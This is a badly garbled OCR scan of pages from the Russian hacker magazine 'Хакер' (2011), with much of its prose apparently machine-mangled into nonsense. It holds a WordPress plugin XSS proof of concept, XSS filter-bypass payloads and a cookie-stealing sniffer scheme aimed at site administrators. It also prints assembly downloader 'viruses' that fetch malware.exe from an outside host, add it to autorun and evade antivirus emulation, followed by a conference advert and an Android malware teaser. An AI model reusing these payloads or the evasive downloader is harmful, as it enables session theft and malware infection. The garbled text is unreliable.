t Tesced on: iiindows 0 fCVE,HftfHHffffffHHffHffffffftffHfHHftffffffffffffffHHfffHtH f SIESTTA 0. О (LFI/XSS) Mulciple Vulnerahilicif!:!l .f download: hccp: 0 /opensourceb:rew. orq/beer-recipes-pluoin/ f f Auchor : TheUzuki. • f:rom HF f mail: uzuki[Q)live{doc)de

f This was wr1t.cen for educacional purpose. Use it; at; your own risk. Ье noc :respons1Ыe tor any damaoe.

В итоге павел учим аlегt-окошко, выведе н ное бери защита :

f Aut;hor will 1

HfHfffffHHfHHHHfHHHffffffffHfHHfHfffHHHfffHffffff

<html>

f f Noces: You need

<script > var а="123" ; al ert ( document.cookie);

/1

об п скандалист ции не без;

ь - "" '·

-

" а"

</sc r i pt >

со

Ье

User

воздушный ас

che Wordpress :aoard

f fffHffHffffHHHffffffffffffHHfHHfHHHHHHfHHHfHHHf --Descripcion ot Nordpress Plugin-Creaces

а

cuscom. post;

суре

for easily enterino beer recipes into 0;ordPr

--Exploic--

</html>

0у Commenting а 0eer Recip, with Thi!l causes а XSS.

В В - коды

Очень постоянно во различных форумных, блоговых равно других движках можно вст р етить в такой мере называемые В В -коды, кото р ые разрешают вставку всего конкретных те г ов, для примеру: [а] ,

[img] ,

а

javascript, the Javascripts,get!l

ехе

- - РоС--

<script>alert {document . cookie) </script>

[Ь]. Не поменьше

не раз встречаются да такие случаи, в некоторых случаях веб-разработчики легко

f

0 ЗЗ1dа v

corn {2011-06-25]

производят замену"[" на"<", малограмотный фильтруя остальное содержимое. Здесь да не запрещается воспользоваться упомянутые меньше js-обработчики.

Пример такого использования:

И юньс кая

XSS во п ла г ан е WoгdP гess

[img src="!@#$%л " onErro r="alert(l);" ] Недостаточные атрибуты

.......

Также оченно интересен э п изод из недостаточными атрибутами:

-

<? ph p echo( ' <input type="text" value="'.strip_tags($_ POST [ 'data' ] ) . ' ">' ) ; ?>

XSS на DuoCMS Чт по части а д е л а т ь на этом от л учае? Н а сметка п рихо ди т вставление какого­

нибудь обработчика, возьмем , onMouseOveг. Н касательно поле, по образу назло, на­

<scri pt src="javascript :alert(document.cookie);" ></sc r ipt>

ходится на самом низу страни ц ы, равно абонент ой ли ли наведет сверху

него мышью [указанный шлифовальщик запускается рядом бери воде курсора мыши сверху элемент!. Решение конец простое- прибросить до этих пор один атрибут на тег

Данный ба г позволительно несложно проэксплуатировать во случае вставки

каких-либо ссылок для страницу, идеже фильтруются даже если символы<>"'.

input. Имя ему- sty le. За ч ем? Затем, в надежде не без; помощью Контроль регистра вводи м ыхданных

стилей изготовить зто п репатриант разме р ом н а всю стра книзу у . Так сатирический

Очень простым и, вроде ни странно, впол н е рабочим вместе с п особом обхода

злемент вполне безошибочно жопа д ет по части д маркер юзе р а . Вот сам по части себе изо

примеров реализации просто-напросто сего неграмотный п отребства:

всевозможных

XSS защит является трансформация регистра вводимых

тегов/протоколов. Часто фильтр режет исключительно теги изо нижнего регистра,

" onMouseOver="alert(document.cookie)" styl e="position:absolute; top:-1eeepx;left:-1eeepx;width:seeepx;height:seeepx;z-index:1eeee;" musor="

например: на

body, script, javascript . Изменив начертание данных тегов bOdY, sCripT равно JaVaScRiPt, автор сих строк мелочёвка обойдем такую из-за щ иту. Обход защит нерекурсивного удаления подозрительных данных Если рисковать внедрить любые теги на тестируемый скри п т, в таком случае примерно

кровь из зубов таковой самый скрипт не мудрствуя лукаво удалит их. Данную защиту также Теория перехода

позволительно обойти, неравно используется одноразовое вычеркивание подозритель­

Любой браузер может шибать JS-ко д от в рассуждении д ноименный про­

ных слов иначе говоря символов. Различие средь одноразовым равным образом многоразовым

токол. Это представляется возможным пр да п ереход е п об ссы л ке ви д а

«j avascript : al ert(1);>>.

Вот п р равным образом планы тегов, идеже равно из п ол ь зуется ссы л что касается ч ­

удалением зависит оттого, рекурсивна ли назначение удаления иначе нет. Вот образчик одноразового удаления:

ная основа:

$code=str_repl ace( "<body" , "" , $code); <а h ref="javascript:alert(document.cookie);" >Moи фот ки</а>

<iframe src="javas cript:alert(document.cookie );" ></iframe>

ХАКЕР

01/154/2011

А смотри притча рекурсивного удаления:

081


взламывание

ПРАКТИЧЕСКИЕ СОВЕТЫ После ознакомления со н еско льким равным образом обходами

СкрытноеиспользованиеактивнойХSS

JavaScript

защит с ХSS-атак настало эпоха предоставить

Та кже популярной ошибкой является

Еще одним редким, так метким методом является

забота некоторым п рактически м сове т ам подле

число лени е ядовитой ссылки от активной

работе из

равно ото прав ка ее админу нужного ресурса. Админ

во страницу. В д анном случае позволительно завалить

д алеко безвыгодный спокон века что-то около прост, в духе кажется. Он

особый флеш-ролик, кто короче

Анонимность

мгновенно постоянно поймет. Гораздо вернее основать

уполномочивать пресловутые кукисына твой снифер .

После получения пользовательских данны х

страничку со таким кодом:

XSS:

со через

XSS

flash

нагрузка ядовитых flаsh-файлов равно комментарий их

HTML

(лаги н, танцевальный шаг дело или — или сессия)

Универсальный градиент

грешно запамятовать насчет безымянность . Способы ее

<body

организации издревле известны : для кси/соксы,

ссылка'" ></ Ьоdу >

VPN, дедик

XSS

путем

oпload; "location.href;'ядoвитaя

Универсальный вектор- сие внедряемая на

НТМL- не без; тр аницу строка, ко торая в сущности далеко не

да другие.

ради ви сит через окруже ни моя персона да вызывает незащищенность

XSS.

следовать т ем сохра ворса ее в тот или иной фрихает

будто

Подстанов ка куковсебе

(например, dalmatincy.fhost . гu ) со именем

в составле ни е п относительно д обн ы х векторов. По зволю

П одставить себя чужие кукисы несомненно чрез

jpg

браузер Орега (Инструменты~ Д ополнительно

эдак :

общезначимый градиент по отношению т Gaгeth

AddType application /x -httpd-php .jpg

java script: /*- - ></ marquee ></sc ript ></ title></textarea></noscript></style> </xmp >"> [img;l] <i mg -/style;-

~Управление

cookiesl, а

да настроить апачевский

oshibka .

.htaccess обложка

гляди

себя на качестве примера п показать мозголомный

подставпять неуклонно на адресную строку браузера. К примеру, во моем самаписнам снифере любые

Далее сверху админскую почт у высылается

кукивыводятся неуклонно на виде готового JS-кода.

приближённо такое письмо:

Таким образом, автор зараз получаю строку вида

держи нем:

;expression&#48&#47;&#42;' / - /*&#39; , /**/ eval(name)//&#41;;width:lee%;height:lee% ; position : absolute ; behavior:url (#default#VML);-o-

Ещ е не в этакий степени примечательный вариант- сие изделие

link:javascript:eval(title);-o-linksource:currentname;

j ava script: documeпt. cook ie;" key;v alue";

Здравствуйте,

(вставляем ее н а атакуемой странице на

сайт,

адресную строку равным образом нажимаем Епt ег).

http ://dalmatincy.fhost.ru / oshibka.jpg

ми адски

нравится

да пишущий эти строки малограмотный знаю как бы давать

Ваш

эту ошибку

Замаскированнаяпроверка Хочу оповестить тебя ото захода получи любопытный

сайт равным образом мгновенного ввода закачаешься однако д оступные

script>.

"><script>alert(l);</

Это выглядит где-то но глупо, во вкусе разыскать

автоматическое устройство вместе с кофе, некоторый пр равным образом зажатии

затрагивать до этого времени денежки для глазах людей вокруг.

XSS

ifгame от ядовитой ссылкой. Причем соз ей-ей ние

alert(l) onerror;eval(name) src;l auto focus onfocus;eval(name) onclick; eval(name) onmouseover;eval(name) backgr ound;javascript:eva l(name) //>"

такого ifгame отпустило сбыть подвижно

путем

JS

равным образом дальше закриптовать сей код:

0 каких­

либо кнопок выдает совершенно деньги, да отдельный день Любые пентесты

Heyes:

как и после плагины

во других браузерах. Ещ е кукисы не грех

полина отчего-то кажется

На многих хак-форумах идут конкурсы

<scr ipt >var l;['reverse' , 'join', 'split', 's lice', '93В', '2CSF //

обоснованно прокладывать

Да , в самом деле интересное постановление ,

скрыто ото админис трат ора равным образом п ользователей .

/9/ 03D225F //73/3/F/ E74223EЗC2F / 0 /97/3 E27

ати Гаресу Хейсу ( twitteг. com /#!/gaгeth­

Например, на проверкифильтрации символов

093' ],il;'б ' ' il;'con \x73\x74\x72\ x75c tor', 01;' ',_;[ 'length ', 'unescape'],li;[] , ll;this;l;l[l[3]](4l [l[e]]()

heyes).

"<"

равно

">"

дозволительно прямо-таки подсоединить на п репатриант ввода

з н ачение " < привет! >". Затем смо трим НТМLкод полученной со т рани цы и, когда д фактически ны е символы вам велись на от воем первозданном

подобные вставки побуждают админа латать дыры, ась? влечет из-за собою огромную п а ле вность.

Также сму щ ает размер равным образом молчание получи неодинаковые

виде, продолжаем вместе с делить с себя д урачка следующим образом:

Н о, исходя с практики поиска ХSS­

багов, э т по отношению далеко не сто ль эффектив же , таково на правах

фильтры каких-либо момент т ей вектора. Л ично ваш покорный слуга

join(ll))(); </scri pt >

в жизнь не невыгодный использовал подобные головоломки именно согласно сим корень м. Н о, кабы ударяться

Dead <Body > - Track

б.mрЗ

И приблизительно подальше не без; остальными тегами.

Подробнее что до шифровке JavaScгipt читай во

получай п исанием ска н буян

сентябрьском номере журнала.

может пр игодиться.

function recursiveReplace($text, $replace, $repalce_to) $text ; str_replace($replace, $repalce_to, $text); return (strstr($text, $replace)) ? (recursiveReplace($text, $replace, $repalce_to)) : ($text);

XSS,

сей разновидность

<bo<bodydy onload; "alert(l)" > По сле удаления

«< body>> установленный

ко д довольно полностью работоспособным:

<body onload; "alert(l)" > ПОСЛЕСЛОВИЕ Я надеюсь, что, невзирая сверху некоторую баянистость кросс-сайтового

$code ; recursiveReplace($code, "<body" , "" );

скриптин га, твоя милость вместе с интересом пр очитал сей материал. В любом случае помни, что-то постоянно новое- сие хоро ш насчёт забытое старое. Кто знает, может

В таком случае

«<body>> удаля ется

изо стих предварительно тех пор, непостоянно адрес безграмотный

быть, помощью серия полет ба гокопатели обнаружат новые интересные

хорош его иметь на иждивении . Обход одноразового удаления выглядит следую­

способы обхода всевозможных фильтров, равно ты да я хоть лопни в рассуждении них на­

щим образом :

пишем ::И:

082

ХАКЕР

01/154/2011


Preview СЦЕНА

01

КОРОБКА В ОБЛАКАХ История успешного старта па, какой

начался не без; аляповатый идеи, вроде произвести мир лучше, а пользователей-счастливее .

Когда на 0008 году ДрюХьюстон равно его на­ парникдраш Фирдоуси затеяли генерация

Dropbox, ны рынкеуже были продуктыдля для синхронизации данных, были утили­

тыдля бэкапа, равным образом были системы контроля версий. Однако парням посчастливилось убедить инвесторов, зачем у пользователей давно сих пор чистый го, аюшки? им воистину нуж­

но- простого какдве дешево сервиса, который дружно решал бы всегда постав­ ленные задачи. Написанный прототип на Pythoп, организованный для мощностях Amazoп SЗ+ЕС2, бойко превратился на бе­

шено именитый проектс 05 миллионами пользователей .

UNIXOID

MALWARE

01

АСС ЕМ Б ЛЕРОМ ПО ЭВРИСТИКЕ

Тесты антивирусов-наше любимое за­ ня т ие. В сие т однова наш брат проверили эвристи­ ческие алгоритмы п опулярных продуктов своими харкорными методиками.

• .

БОЛЬНЫЕБОТЫ

Aпdгoid Maгket невыгодный проверяет добавляе­ мые приложен равно я, нежели боевито пользуются

создатели малвари . Но который представляет

• ХАКЕР

Многие серьезные разработчики софта

используюаппаратнуюзащиту HASP. Но даже аппаратный родник можноэмулиро­ вать, малограмотный прибегая ко пальянику.

01/154/2011

Как выдвинуть получи начальный план одному L iпuх-приложению

00% процессарного времени, другому5% оперативки, а третьему - общем 028 Кб ширины интернет-канала? Да ле г ко'

собою стабильный зловред?

SYN/ACK

CODING

ANTIHASP

01

ВОЙНАЗАРЕСУРСЫ

01

DLL-ХАРДКОДИН Г

Чтобы привести в действие личный код, малограмотный обязательно компилироватьеговехе-файл равным образом ждать, когда невращение ер кликнет по части нему во проводнике.

Внедряем свою

DLL на чужую программу.

01

НА СТРАЖЕ ПЕРСОНАЛЬНЫХДАННЫХ Разговор атом, что правомерно защитить персональныеданные, никак не покупая кота на

мешке. Опыт человека, кой съел на этому собаку.

083


MALWARE

Самое концептуал равным образом з всех чита­ тельских пожеланий, которые нам присылали по мнению следам

предыдущих тестов,- нефралгия ­ ше х ардкора . Ну сие наша сестра равным образом самочки

хотели предоставить : ] . А следую ­

Сергий Греков

-

Полный конферанс статьи ж дет тебя для диске .

0]

качес тв е уча от тнико на д ля бери ш его касательно ч ере дн ого теста аз многогрешный вы­

б р а л п моя персона т ь аверо во изо совер ш е н же разных << ка т егорий»:

AVG, Avast, ClamAV, Pa nda, Comodo. Как види ш ь, т ут пр ису т ствуют

четное число ы ре халяв н ых а н тиви р уса, да насчёт д ин- крутой, платн ый, не без; медве­ дем нате обложке, пользу кого сравне н ия. Все тесты мы для на од гиттия лещадь VmWaгe вместе с

установленной Wi ndows ХР SРЗ х86. << Вирусы >> для того теста пишущий эти строки писал сверху ассемблере, а компилировал

МАSМ'ом. П ре д ы д у щ ий испытание l xakep.гu/post/56236/default . asp l заклю­ чался на том, ч ведь моя персона ес п ростенький Downloadeг, тот или иной улучшал

щее в области популярности мнение­

различными п у тя ми , чтоб отделаться ото мол т ектирования. П ри-

хлеще подозрительности с целью

нежели разве во пр ош л ый однова ваш покорный слуга старался пускать в дело тонкости работы

объектов тестирования. Вдруг некоторые аверы невыгодный определя­

ли наши тесты потому, что-то они

пр оцессо р а во х86, в таком случае этот ч мастер своего дела автор этих строк п робовал обой т да ин т ивирус, п риме н яя особе нн ос ти Wind ows.

ВИРУС НОМЕР РАЗ Во т ко д выше- е г по части п е рв ого присутствие критерий :

малограмотный ахти подозрительны? ОК, сделаем прогу, которая скачи­

вает фа й л изо сети, записывает его на автомобиль з агрузку равно запускает.

Сомнительный функционал, не так ли?

.data pi PROCESS_INFORMATION <> sta r tupinfo STARTUPINFO <> . data dd RunKey db "SOFТWARE \Microsoft \Windows \ CurrentVersion \ Run " , Malware db "Malware" , e р Кеу

ХАКЕР

е

01 / 054/2011


Ассемблером до эвристике

* л

0 __

.__._

0

;.

0

0'

+

0 '

•••

.

r ~a..-

'

.ее

"' ' D--

'

~.

_ _ , ___ ...__

J;

0

••'t1J

01'/f!i!!m!!'!!"""'"&l=~-:::-=~:.::===.:,~~:.:.::-.о.. l!piAD(I-THtl1710110tl-..ntOY!W*t,-IIIOoH~MW-Т8б~W--!'CNНw/l .--.,C'I- IOOI~tтpOQ"~OIIfi'!Wo\OЖ~IJNIMfOMJТ>Ntcl•oO!IoиtttМA811t

-.ЯAIIONн~мnRпt~~lllfiiiiii~"--.,~'~~A Ооо&жо-~

t), . _

_.... _ _ .s..t.

•!I\IOJihOНIТ8Rn~oa-n.нм~W-WI!c~g&"p~~" ЦliфfJOIWICIIOJifiHC ... oC.бн~IIOOJIIICНOICICr....-. oCIIНIIjiOOМIO!Ifii*ADCf'/1\t~HFrмВSOIII,

• t!OII\'t...",~ • ..-.oe.-.Rнea-IOPAI•H~(~тe-ooo:o~ OtiOIКIIТWWOOoO.,o-noc~

··---

Кf!IOt-AOAI.-•II-.__Ciopмmиo,oo:ncчnlip,RAR,Tar,Qzip,IIZIIp.1,0\..E2,

~CНI(8W.,81$мдp~n~t;

относительно ~naмtf!OUI~IItllll~fOfl\0'<1- . ."""'· о K~~··-..-.o.ELfнPer!IЫtE*utiЬII,DD~Uf'XrSO,PIIIIt, thPкl!,-lal,МEW,Upldlнa..,иr...-StJE,YOOaCr/IIIOrн~

а

comodo

clamav- опенсорсный антивирус,

конечно дружок нашими юниксоидами вроде Андрюшка равным образом Сергея Яремчука, негаданность победил. С них причитается!

бдит согласно полной программе. Но ему всё-таки нравится!

.code url db "http:/ /www . malwareurl.com/malware . exe·~, e pathtosave db " c: \ windows \ system32 \ malware.exe" , e start: invoke URLDownloadToFileA, е , offset url, offset pathtosave,

е,

.......... •

mov еах_, [ еах + leh ] mov еах, [еах + езсh ] mov еах, [еах] cmp еах, dword ptr [discCroot] jz malware_code jmp exit

е

malware_code:

invoke RegCreateKeyExA, HKEY_LOCAL_MACHINE, offset RunKey, е , е , REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, е , offset рКеу,_ е

Здесь приведена лишь << интересная >> ча из ть кода, эдак вроде все остальное осталось аналогичным предыдущему вирусу. Но буква по­ следовательность инструкций мертвяк nокажется большин вместе с тву

invoke lstrlenA, offset pathtosave

читателей неочевидной. А на со е потому, зачем автор бог хитер:). В самом

invoke RegSetValueExA, рКеу, offset Malware, offset pathtosav~, еах

е,

REG_SZ,

начале на перечень ЕАХ попадает содержание nамяти в соответствии с смещению ЗОh во сегменте

FS.

В си со темах

Windows NT

на этом ме из те содержит­

ся индикатриса бери узел РЕВ [Pгocess Enviгonment Block). Этот секция

invoke RegCloseKey,

заключает системные причина , описывающие суд . Далее так тому и быть

рКеу

послание для элементу, отстоящему для 00h с основные принципы РЕВ ' а- ука­

invoke CreateProcessA, offset pathtosave, е , е , е , NORMAL_PRIORITY_CLASS, е , е , ~, __offset startupinfo, offset pi

зателя сверху

RTL_USER_PROCESS_PARAMETERS.

Затем «вирус >> беретик дворд до указателю до смещению ЗС . По этому смещению расnолагается линия во молод равным образом коде, содержащая

текущую паnку . Таким образом, ежели « вирус >> запускается вместе с ди со ка

invoke ExitProcess,

С, в таком случае во регистре ЕАХ приходится очутиться значимость discCгoot . Так

е

должен бытовать быть нормальном исполнении файла, а антивиру с может да невыгодный состоять осведомлен в рассуждении содержимом упомянутых структур .

retn

Таким образом, разве во регистре ЕАХ окажется малограмотный происхождение диска С, то эксплуатация приходится завершиться. Если эмпирия во антивирусе неграмотный

Здесь по сию пору очевидно- тупое списывание файла присутствие помощи

URLDownloadToFile,

а а там запускание сего файла от через

знает, вроде безошибочно исnолнить цельный код, то, вернее всего делов , обложка

CгeatePгocess. Помимо сего nроизводится присовокупление скачанно­

окажется « чистым >> . Протестировав его , видим , ась? те а самые

го файла на автозагрузку стандартным путем. По идее, до сей времени пред­

неудовлетворительно антивируса его равно обнаруживают, а прочие трое вторично

ставленные антивирусы должны его детектить. Однако оказалось,

м по части лчат.

что такое? раскрыть упрощенный Downloadeг способны только лишь

ClamAV.

Причем

AVG

выдал «общиЙ>> вердикт, а

ClamAV,

AVG

равным образом

по­

ВИРУС ЗА НОМЕРОМ ТРИ

видимому, нет- Win32/DH равным образом W32 . SPERO.Pгolixus.0825 соответ­

Теnерь моя персона решил опробовать , знают ли антивирусы оборона начинка

ственно. Идем после этого .

модуля keгnel32. Для сего пишущий эти строки вместе с ваял соседний « троянец >> :

ЗЛОБНЫЙ ТРОЯН НОМЕР ДВА Вот шифр нашего второго рядом мера:

kernel32 db "kernel32",0 dword_PE db "РЕ",е,е

discCroot db "С" , start: assume fs:nothing

start: push offset kernel32 call LoadlibraryA

mov

еах,

ХАКЕР

fs:[ Зeh ]

01 /15 0/201 0

е,

": " ,

е

mov

есх,

[еах

+

езсh ]

085


MALWARE "· AVG

-

Avast ClamAV lmmun1tet Panda Comodo lnternet

l=ERO Prol1xus 0825

W32.SPERO. Prol ixu s.0825

W32.S PERO.Prolixus.0825

l W32 .SPERO.Prolixus.0825

W32.SPERO.Prolixus.0825

-

Secuпty !

:

- .._

--+--------1

Результаты нашего теста

функции завершается неудачей, так п оследняя возвращает 08h.

mov е а х, [ еах + е сх ] cmp еах, dwo r d pt r [ dwor d_PE ] jz mal wa re_code jmp Exi t

Е не без; ли антивирус безвыгодный знает касательно правильном возвращаемом значении, а просто пропускает функции сиречь поступает раз как-то в соответствии с - иному, же все равно неверно, в таком случае возлюбленный в долгу направляться в области ложной ветви, которая при­

водит для завершению процесса со через ExitPгocess. Эта попытка Этот шифр на самом начале п олучает центральный домицилий kегпе132. Затем

п роисходит требование ко полю e_lfanew структуры IMAGE_DOS_

HEADER.

наконец-то заставила << отстать >>

AVG, отчего е д и~с т ве н ным ClamAV.

антивирусом, мол т ектирующим таковой файл, в отношении ко азался

Это равнина охватывает отстранение через азбука файла поперед « нового »

заголовка. В качестве << внове г по отношению >> могут обрисовываться РЕ- ,

ПРИМЕР НОМЕР ПЯТЬ

LE- равным образом N Е ­

з аголовки . Но на данном случае, очевидно, дальше долженствует входить

Н а п ос ледок мы решил пров е рить , по образу будут во е сти себя антивирусы,

дворд РЕ\0\0. На зто да производится осмотр . Если антивир у вместе с

е сли на коде хорош прис у т от твовать великоватый да долголетний цикл. Для сего

з нает, сколько затем содержится, в таком случае файл, скоренько всего, достаточно задетекти­

моя особа есть очере д утнапиштим << вирус >> :

рован, т ак как бы на э т ом случае хорош ис п олняться отрог downloade г 'a. Ситуация от детектированием отнюдь не изменилась.

. code url db "http://www.malwareurl.com/malware.exe" , e pathtosave db "malware.exe" , e

ЧЕТВЕРТЫЙ ПРИМЕРЧИК Следующее, что-нибудь пишущий эти строки решил проверить-работа эвристически х анали­ з аторов антивирусов от ре д кими АРI-функ ц иями. Причем функцию

мы на ы бирал т акую, дай тебе возлюбленная возвращала малограмотный мелкая сошка равно никак не единственный на случае провала. Мой предпочтение тумба нате TгeeResetNamedSecuгitylnfo:

.code url db "http://www.malwareurl.com/malware.exe" , e pathtosave db "malware.exe" , e start: invoke TreeReset NamedSec urityi nfo, e , e , e , e , e , e , e , e , e , e , e

рор

MSDN, сия деятельность сбрасывает secuгity infoгmation

во дескрипторах защиты выбранног что касается дерева объектов. Если затребование

Оnовещение AVG Resident Shietd

.-

•:J

Cycle_Begin : call GetTickCount sub edx, еах push 0eeeh call Sleep push е call GetModul eHandle

cmp еах, 0Bh jz Malware_Code jmp Exi t П насчёт д а н ным

start : mov есх, seeeh push есх

Х

есх

dec есх push есх jnz Cycle_Begin К од чрезвычайно тривиальный- 0000h раэ достаточно воспламеняться ф у нкция GetTickCount, GetModuleHandle равным образом Sleep, не без; параметром 0000h. В

результате позволяется короче проверить, из п особны ли эвристи ч еские

Обнаружена угроза!

практически а лизаторы обхо д ить такие долгие циклы !на обыч н ой машине код Downloadeг·a вынужден сделать первые шаги облекаться в мясо и кровь модель н что до при помощи сутки:

Им.А файла :

c:\DocLrnents and Set th;ls\дA........crpaтop\Paбo 'loiЙ

Имя угрозы :

В0Зf«)ЖНО з.аражен..е неизвестныr-~ вирусом Wn32/DН . CXXXXXXJO{CXXXJBOOCHXXXXXJ20-!XXXXXJOO} ~

cтon\Xakep_Т!Yd . exe

Обнаружено f'1)И ОТtq:)ЫТИИ .

+ Переместить во хранwице (М) (рекомендуется ) Эаражежый файn довольно сохранно помещен получи и распишись изоляция на ХраниJИЦе вирусов .

+ Перейти ко файлу (G) Отi<рЫТИе nan<И, содержащей файл, на Г)юеод>И<е

+

0000h • 0000h; 0 000 OOOh; 03 086 080

мс;

03 086

с;

0398

мин;

03

часа!. Короче , ежели антивир у сы будут легко да не без; полнять адрес !эм у ­ пируя сиречь почти некоторый собс т венной виртуалкойl, ведь времени у них в сие отнюдь не хватит. А чисто кабы у п ользователя компьютер ь ютер будет работать день вне перезагрузки , ведь нагрузка вместе с << вредоносного >> урла успешно достаточно произведена . В итоге- сносно малограмотный изменилось.

Только ClamAV справился от э тим << вирусом >> , выне от ваш покорный слуга решение W32 . Wndows.

SPRO. Pгoli x u s .0825.

\1гнорvровать угрозу Определен-tЫЙ файп останется на текущем местоrюrюжЕ!Н'И в АИС:ке . В целях

бе3011ё1СН0Сти t<DМ""'ОНеНТ Resic:lent доступ ко эараженнь~>< файлам .

Shleld

безвыгодный nозволяет пользователям nолучать

ЗАКЛЮЧЕНИЕ Р езультатами сего теста моя персона был обескуражен. П относительно ч ему оплачиваемый ан­

тивирус ото

Panda ни ложки невыгодный обнаружил ? ! П очему нелёгкая п броневой ClamAV

нисколько безвыгодный пропустил , а весь прочие пропустили?! Как вместе ра­ ботает Третий nример дете для тирован

086

AVG. Следующи й т ест возлюбленная у но никак не nотянет

AVG,

только безграмотный во се?!

почто ем у посчастливилось обнар у жительствовать только порядком << вир у сов >>, Вопросы , вроде обычно, остались помимо ответов . :Х:

ХАКЕР

01/ 054/2011


Zeronights

За месячишко давно конференции довольно объявлен

Мы посетили бездна международных конференций через Индии

последний оглавление участников, прошедших пред­

впредь до Америки да по всем углам нас спрашивали касательно российских мероприятиях.

варительный отбор. Следи из-за новостями!

Все удивлялись, нет-нет да и я говорили, который sесuгitу-конференций в России нет. Слава Богу, на этом году состояние основы меняться, равным образом да мы от тобой

жуть рады доставить новую конфу Zeroпights, которая пройдет

05 ноября

FAST-TRACK СЕК

ИЯ

Помим что до стержневой секции из докладами, будет организована да секция, посвященная не­

большим, же значимым исследованиям, а

на Питере.

вдобавок без труда интересным мыслям, идеям равным образом

наработкам во области ИБ . В протекание

минут

Федор Ярочкин

сийское объединение

школы, выше- соотечественник, писатель Х-РгоЬе.

блемах равно их решениях, а вдобавок поднимут про

Приехал для н ам с Тайвани. Доклад: «Анализ

обсуждения острые вопросы . Кроме этого, на

компании

Digital

DEFCON

возле поддержке

Secuгity. Цель конферен ции­

(Amorize] . Хакер старой

05

Организа т ором мероприятия выступает рос­

докладчики расскажут об наболевших про­

конце секции все одинаково какой член конференции

сосредоточить лучших специалистов на своей области,

незаконной Интернет-деятельности>> .

которые расскажут что касается последних достижениях,

Самойла Шах

Oday уязвимастях

циалист в области безопасности, честной визитер получи

свое исследование, очертить проблему иначе

крупнейших международных конференциях

высказа т ься соответственно теме стойком н а конференции.

равно методиках взлома.

Доклады, представленные н а конференции,

спе­

сможет заразиться

0 минут

славы да увидеть

равно будь здоров от п икер. Прилетит изо загадочной

во реальный час проходят негибкий противоборство

Индии . Доклад: « Веб-войны

командой независимых вместе с п ециалистов, которые

равным образом выберут самых достойных . В числе про­

(NetSquare) . Известнейший

КОНКУРСЫ ПО ЖИВОМУ ВЗЛОМУ

0>>.

Алексий Синцов (DigitaiSecurity] . Автор

Конкурсы любят все, равным образом организаторы конфы

граммнога комитета такие хорошо извест­

новых методик эксплуатации равно «уб ийца >> ДБО.

решили скоротать их по-особенному. На

ные специалисты, как: Крис Касперски, Д ейв

Представит н а свой коллегия новоизобретённый фильм ужасов << Где

Zeгonights отнюдь не короче выдума н ных ситуаций.

лежат деньги?>>.

Желающим буду т предоставлены настоя-

Аител

ICEO l mmuпity, С Ш А], Пит ер Ван Иекхаут The Gгugq ICOSEINC, Тайланд], Женюра Климов IPWC, Россия], Илья ICoгelanTeam , Бельгия],

Лександр Матросов

(ESET]. Viгus-Fгeeman

излечитвсехотновыхтиповтроянов.Доклад:

щие программно-аппаратные комплексы да

системы. На таких системах отдельный сможет

Медведевекий IDigitaiSecuг i ty, Р оссия], Ни ки т а

«Со временныетенденциираэвитиявредо­

подвергнуть испытанию домашние со п особности по мнению п оиску н овых

Кислицин (журнал «Хакер>>, Россия] да Алек­

носных программ в целях систем ДБО>>.

уязвимастей как

Санюха Поляков

АСУ-ТП, платежный терминал, сервер не без;

са ндр Матросов

IESET, Россия] . Н а сущий

время поуже заявлены следующие доклады:

Алексий Лукацкий

(Cisco] . В

представлении

отнюдь не нуждается 0 Доклад:« Бостонекая форма

<< Да йте ми

(Digital Security) .

SAP моя особа его сломаю>>.

Оценит

безоnасностьприложений.Докладизсек­ ции FastТгack: <<Не трогай, а в таком случае развалится:

Oday

на режиме онлайн.

SAP

системой равным образом многое другое- попытайся взло­

мать! Помимо этого, будут конкурсы с н аших п артнеров получи дозор WA F, отыскивание уязвимастей равно

киберпреступности иначе говоря какова бизнес­

взламывание торговля приложений на экстремальных

хакинг замков llockpickiпg] со призами, закры­

модельсовременно г в отношении хакера?~

условиях>> .

тыми замками. ::И:

ХАКЕР

01/154/2011

087


MALWARE

Овчинников равный Богу aka Night Storm lnstorm901agmail.coml


Больные роботы

-

Кое-где в представленных сорцах мы допустили пару

ламерских ошибок. Это к того, чтобы решительно уж неадекватные

• Ьlog .trendmicro.com -

Информация,

блог компании Tгend Мiсго, занимающейся разработкой антивирусного ПО, содержит много интересной информации

представленная

...

nредназначена

до невероятия в целях

соответственно малвари, во часть числе равным образом по части

ознакомления равно

андроидной. Там но твоя милость найдешь

самозащиты. Помни,

nолный nост относительно

почто наnисание

Google++

dёvelopers

во статье,

скрипткидисы никак не

• www bгjghthub . com/moblle/

вредоносного ПО

кинулисьих безропотно

google-andгojd . aspx - благообразный

карается законом.

компилировать.

англоязычный ресурс, получай котором содержится бессчётно информации как в области использованию Android, так равным образом до разработке nод него.

----

PUЫIC

Mt!thods

~·-=-"'~"'·-·~-..-·-.."'j·J===-•d•==ш::..~~-sмs .. ...., •• vun .,......,U...Inoodor

..-.oon

~doe(lrlgol\ll"'"""''f

.rJ Отnравляем платное

ВИРУСЫДЛЯ ГУГЛОФОНОВ: КАК ОНИ СОЗДАЮТСЯ И ЧТО С НИМИ ДЕЛАТЬ?

SMS?

заниях, а саму малварь ми выхлопотать безвыгодный посчастливилось . На каждый случай, глянь свою карту памяти бери объект указанной папки, может быть,

тебе счастье повезло лишше

;1.

Буквально малость недель взад появилось некое вставка

Google++,

маскирующееся около использование про известной социаль­

утнапиштим козни через корпорации добра. Оно вот и все собирает всю информацию о пользователе, только меньший беспокойство общественности вызвала

ипостась « подслушивания разговоров >> . На практике всегда оказалось банально: возле обнаружении входящего звонка дополнение перево­ дит интертелефон во неслышный режим, скрывает оповещение по части звонке и поднимает трубку. Что такого позволительно подслушать, разве автомат лежит

В стане владельцев мобильных телефонов на ОС

Android

от недавних пор растет беспокойство.

Причина тому- ахнуть неграмотный успеешь растущее цифра

на кармане, ваш покорнейший слуга малограмотный знаю, пускай бы неравно учесть, аюшки? близ переговорах многие

люд кладут вертушка пизда собой, так определенная выгода ото такого

способа может быть.

СТРАТЕГИЯ И ТАКТИКА Google из-за то, почто они

всевозможной малвари, которая пробирается

Трудно винить

в автоматы владельцев, вдобавок отнюдь не откуда­

держи мар кете. Ведь сие были самые обычные приложения , хотя из недо­

нибудь, а радикально легальным способом­

(которая существует на

устанавливается вместе с маркета. Не будем оставаться в стороне равно познакомимся не без; ситуацией поближе.

кументированными функциями

отнюдь не уследили следовать приложениями

:1. Отсутствие тщательной

проверки

Apple AppStoгel в свою очередь понятно- сие поступок на­

навстречу разработчикам, так чтобы те могли стремительно беречь равным образом

